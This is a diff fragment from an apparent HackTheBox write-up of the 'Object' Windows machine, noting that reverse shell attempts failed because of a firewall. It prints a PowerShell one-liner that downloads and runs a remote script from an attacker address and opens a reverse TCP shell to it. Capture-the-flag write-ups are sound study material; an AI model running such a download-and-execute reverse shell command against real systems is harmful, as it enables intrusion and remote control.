ryanrestine/HackTheBox_WriteUps/windows_machines/object_notes.md

 all failed.

-Same goes for any type of reverse shell activity:
+Same goes for any type of reverse shell activity due to the firewall:

 ```
 powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.214/Invoke-PowerShell.ps1')); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.214 -Port 443